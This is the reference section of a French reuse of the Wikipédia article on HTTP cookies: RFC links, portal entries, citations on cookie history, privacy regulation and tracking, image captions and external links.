× - (en) HTTP State Management Mechanism, RFC 2109, février 1997, ancien standard de l'IETF. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
(en) HTTP State Management Mechanism, RFC 2109, février 1997, ancien standard de l'IETF.
× - (en) HTTP State Management Mechanism, RFC 2965, octobre 2000, ancien standard de l'IETF. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
(en) HTTP State Management Mechanism, RFC 2965, octobre 2000, ancien standard de l'IETF.
× - (en) HTTP State Management Mechanism, RFC 6265, avril 2011, standard actuel de l'IETF. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
(en) HTTP State Management Mechanism, RFC 6265, avril 2011, standard actuel de l'IETF.
×
- Portail d’Internet SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Portail d’Internet
× - Portail de la sécurité des systèmes d'information SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Portail de la sécurité des systèmes d'information
× - Portail des télécommunications SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Portail des télécommunications
× - Portail des technologies SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Portail des technologies
×
Notes et références
Retrouvez les documents cités dans le texte, puis revenez au passage concerné.
Références 1 à 25
- Prononciation en anglais retranscrite selon la norme API, source : Cambridge Dictionary. ↩
- (en) « Usage statistics of Cookies for websites », sur w3techs.com.↩
- « Respect de la vie privée en ligne l Cookies », sur Your Europe (consulté le 1er novembre 2022).↩
- (en) John Schwartz, « Giving the Web a Memory Cost Its Users Privacy », sur nytimes.com, 4 septembre 2001 (consulté le 12 décembre 2014).↩
- Commission d’enrichissement de la langue française, « témoin de connexion », sur FranceTerme, ministère de la Culture (consulté le 14 juillet 2020).↩1 ↩2
- « témoin », Grand Dictionnaire terminologique, Office québécois de la langue française (consulté le 14 juillet 2020).↩1 ↩2
- Système de design gouvernemental, « Bannière de gestion des témoins de navigation », 18 octobre 2024 (consulté le 20 février 2025).↩
- (en) Martin Kihn, « Cookies, Chaos and the Browser: Meet Lou Montulli », sur gartner.com, 6 avril 2018 (consulté le 4 janvier 2023).↩
- (en) « Presse : Netscape Communications publie gratuitement un nouveau navigateur web », Web.archive.org (consulté le 22 mai 2010).↩
- (en) « Publication de Marc Andreessen sur Usenet: « Here it is, world! » », Groups.google.com, 13 octobre 1994 (consulté le 22 mai 2010).↩
- (en) « Persistent client state in a hypertext transfer protocol based client-server system », sur justia.com, 6 octobre 1995 (consulté le 4 janvier 2023).↩
- (en) « HTTP State Management Mechanism », Request for comments no 2109 ↩
- (en) I don't care about cookies 2.3.0, addons.mozilla.org, consulté en décembre 2014.↩
- « Gérer les cookies de session | Firebase Authentication », sur Firebase (consulté le 19 octobre 2025).↩1 ↩2
- (en) « Full Third-Party Cookie Blocking and More », sur WebKit, 24 mars 2020 (consulté le 9 décembre 2025).↩
- (en-US) Dave Camp, « Firefox Now Available with Enhanced Tracking Protection by Default Plus Updates to Facebook Container, Firefox Monitor and Lockwise », sur The Mozilla Blog (consulté le 9 décembre 2025).↩
- (en) Jenny Boriss (Mozilla), Defeating the Cookie Monster: How Firefox can Improve Online Privacy, le 2 juin 2010, traduit ici↩
- « La publicité ciblée : la fin d’une époque », sur Infopresse (consulté le 8 avril 2021).↩
- « Une nouvelle voie pour la Privacy Sandbox sur le Web », sur Privacy Sandbox (consulté le 9 décembre 2025).↩
- (en) « HTTP State Management Mechanism », Request for comments no 2965 ↩1 ↩2 ↩3
- « Cookies, mouchards : comment vous êtes suivis sur Internet », Le Monde, 30 mars 2018 (lire en ligne, consulté le 1er novembre 2022).↩
- (en) A. Barth, « RFC 6265 - HTTP State Management Mechanism », Request for comments no 6265, Avril 2011 ↩
- (en) « Cookie Expires/Max-Age attribute upper limit (issue #729) », sur W3C TAG, 6 avril 2022.↩
- (en) Request for comments no 6265 ↩
- « Les attributs « Expiration du cookie » et « Âge max. » sont désormais associés à une limite supérieure », sur Chrome for Developers.↩
Références 26 à 37
- Vincent Fagot, « Les publicitaires digèrent mal la fin des cookies sur Internet », Le Monde, 14 février 2020 (lire en ligne, consulté le 14 août 2020).↩1 ↩2
- (en) Cookies law changed at 11th hour to introduce 'implied consent sur The Guardian, le 26 mai 2012.↩
- Référence présente dans le document original, détail indisponible dans cette version.↩
- avis du G29 de 2010 [PDF].↩
- « Cumuleo : le baromètre du cumul des mandats en Belgique », sur Cumuleo (consulté le 14 août 2020).↩
- Le Monde avec AFP, « Selon le Conseil d’Etat, un éditeur peut bloquer l’accès à son site à un internaute qui refuserait les cookies », Le Monde, 19 juin 2020 (lire en ligne, consulté le 14 août 2020).↩
- « Opt-in, opt-out, ça veut dire quoi ? », sur CNIL (consulté le 4 janvier 2023).↩
- Menaces liées aux vols de cookies et contre-mesures, ANSSI (lire en ligne [PDF]).↩
- (en) « You Deleted Your Cookies? Think Again », Wired (consulté le 16 avril 2011).↩
- « BrowserSpy », gemal.dk (consulté le 28 janvier 2010).↩
- « IE "default behaviors [sic]" browser information disclosure tests: clientCaps », Mypage.direct.ca (consulté le 28 janvier 2010).↩
- (en)[PDF]Peter Eckersley, « How Unique Is Your Web Browser? », sur eff.org, Electronic Frontier Foundation, 17 mai 2010 (consulté le 23 juillet 2014).↩
La connaissance se vérifie
Sources et méthode
- Wikipédia · Cookie (informatique) ↗CC-BY-SA-4.0
- Cookie (informatique) ↗CC-BY-SA-4.0
Médias mentionnés dans la source (8)
- Une interaction possible entre un navigateur web et le serveur hébergeant la page web. Le serveur envoie un cookie au navigateur et le navigateur le renvoie quand il appelle une autre page. ↗ · Droits de reproduction à vérifier
- Exemple d'une réponse HTTP de google.com, qui met en place un cookie avec des attributs. ↗Halftoning introduction.png : Slippens / derivative work: McSush · CC BY-SA 2.5 · Détails de la licence ↗
- Dans cet exemple fictif, une entreprise de publicité a placé des bannières dans deux sites web. En hébergeant les bannières sur ses serveurs et en utilisant les cookies tierce partie, l'entreprise de publicité est capable de suivre la navigation de l'utilisateur à travers ces deux sites. ↗Tizio · CC BY-SA 3.0 · Détails de la licence ↗
- Un cookie peut être volé par un autre ordinateur sur le réseau. ↗ · Droits de reproduction à vérifier
- L'écriture de script dans le site : un cookie qui devrait seulement être échangé entre le serveur et le client est envoyé à un autre tiers. ↗ · Droits de reproduction à vérifier
- Modification du contenu : un attaquant envoie à un serveur un cookie invalide, éventuellement réalisé à partir d'un cookie valide envoyé par le serveur. ↗ · Droits de reproduction à vérifier
- Dans la méthode du remplacement de cookie, l'attaquant exploite un problème du navigateur pour envoyer un cookie invalide au serveur. ↗ · Droits de reproduction à vérifier
- Une interaction possible entre un navigateur web et le serveur hébergeant la page web. Le serveur envoie un cookie au navigateur et le navigateur le renvoie quand il appelle une autre page. ↗HTTP_cookie_exchange.svg : Tizio derivative work: TheLittleMachineForYou (talk ) · CC BY-SA 4.0 · Détails de la licence ↗
Liens externes cités dans le document (17)
- autorise ↗Dans « Notes et références » du document source
- Cookie (informatique) ↗Dans « Voir aussi » du document source
- cookie ↗Dans « Voir aussi » du document source
- Cookie (informatique) ↗Dans « Voir aussi » du document source
- www.wikidata.org ↗Dans « Liens externes » du document source
- Enciclopedia De Agostini ↗Dans « Liens externes » du document source
- Store norske leksikon ↗Dans « Liens externes » du document source
- Treccani ↗Dans « Liens externes » du document source
- Tchéquie ↗Dans « Liens externes » du document source
- « Profilage : vous reprendrez bien un petit cookie ? » ↗Dans « Liens externes » du document source
- Directive 2009/136/CE du Parlement européen et du Conseil du 25 novembre 2009 ↗Dans « Liens externes » du document source
- Directive 2009/136/CE du Parlement européen et du Conseil du 25 novembre 2009 ↗Dans « Liens externes » du document source
- Cookie ↗Dans « Liens externes » du document source
- Persistent Client State HTTP Cookies - Preliminary Specification ↗Dans « Liens externes » du document source
- HTTP State Management Mechanism ↗Dans « Liens externes » du document source
- HTTP State Management Mechanism ↗Dans « Liens externes » du document source
- HTTP State Management Mechanism ↗Dans « Liens externes » du document source
Texte adapté à partir des sources indiquées. Les contenus Wikipédia et Wiktionnaire sont réutilisés sous CC BY-SA 4.0. Les droits des médias sont précisés séparément. Révision originale et contributeurs ↗